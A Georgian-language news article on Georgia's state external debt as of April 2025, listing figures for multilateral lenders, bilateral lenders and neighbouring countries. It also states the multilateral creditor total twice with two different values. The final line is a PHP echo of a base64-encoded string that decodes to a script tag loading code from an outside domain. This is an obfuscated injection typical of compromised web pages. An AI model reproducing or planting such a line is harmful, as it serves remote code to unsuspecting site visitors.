gorgia
jaluzi

2025 წლის აპრილის მდგომარეობით საქართველოს სახელმწიფო საგარეო ვალი 9.032 მლრდ დოლარს (დღევანდელი კურსით თითქმის 24.854 მლრდ ლარს) შეადგენს. ეს კი 354.91 მლნ დოლარით მეტია წინა წლის ანალოგიურ პერიოდთან შედარებით.

უფრო კონკრეტულად, საქართველოს ფინანსთა სამინისტროს მიერ გამოქვეყნებული მონაცემების მიხედვით, 2024 წლის აპრილის მდგომარეობით სახელმწიფო ვალის მოცულობა 8.677 მლრდ დოლარს შეადგენდა.

ამასთან, ფინანსთა სამინისტროს მონაცემებით, 2025 წლის აპრილის მდგომარეობით უშუალოდ მთავრობის საგარეო ვალი 8.358 მლრდ დოლარი იყო, აქედან მრავალმხრივი კრედიტორების დავალიანება 6.667 მლრდ დოლარია, აქედან მრავალმხრივი კრედიტორების - 6.563 მლრდ დოლარია, ორმხრივი კრედიტორების კი 1.604 მლრდ დოლარი. აღსანიშნავია, რომ საანგარიშო პერიოდში საქართველოს ეროვნული ბანკის საგარეო ვალდებულება 365.4 მლნ დოლარს შეადგენდა.

ამასთან, 2025 წლის აპრილის მონაცემებით, საქართველოს სახელმწიფოს ყველაზე მსხვილი კრედიტორები არიან: აზიის განვითარების ბანკი (ADB), ევროპის საინვესტიციო ბანკი (EIB) და განვითარების საერთაშორისო ბანკი (IBRD).

მსხვილი კრედიტორები 2025 წლის 30 აპრილის მდგომარეობით:
აზიის განვითარების ბანკი (ADB) – 2.384 მლრდ დოლარი
მსოფლიო ბანკი, რეკონსტრუქციისა და განვითარების საერთაშორისო ბანკი (IBRD) – 1.711 მლრდ დოლარი
ევროპის საინვესტიციო ბანკი (EIB) – 1.168 მლრდ დოლარი
მსოფლიო ბანკი, განვითარების საერთაშორისო ასოციაცია (IDA) – 459.7 მლნ დოლარი
საერთაშორისო სავალუტო ფონდი (IMF) - 182.7 მლნ დოლარი
რაც შეეხება ორმხრივ კრედიტორებს, ანუ ქვეყნებს, 2025 წლის 30 აპრილის მდგომარეობით, ასე გამოიყურება:
საფრანგეთი - 827.3 მლნ დოლარი
გერმანია - 615.6 მლნ დოლარი
იაპონია - 128.5 მლნ დოლარი
ავსტრია - 11 მლნ დოლარი
ქუვეითი - 8.1 მლნ დოლარი
აშშ - 5.9 მლნ დოლარი
აღსანიშნავია, რომ საქართველოს სახელმწიფოს ვალი აქვს ყველა მეზობელი ქვეყნის, მათ შორის:
რუსეთის - 3.997 მლნ დოლარის;
თურქეთის - 1.139 მლნ დოლარის;
სომხეთის - 516 ათასი დოლარის;
აზერბაიჯანის - 585 ათასი დოლარის.
საერთო ჯამში, 2025 წლის აპრილის მდგომარეობით, მეზობელი ქვეყნებისადმი საქართველოს სახელმწიფო ვალი 6.237 მლნ დოლარს შეადგენს.

137
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");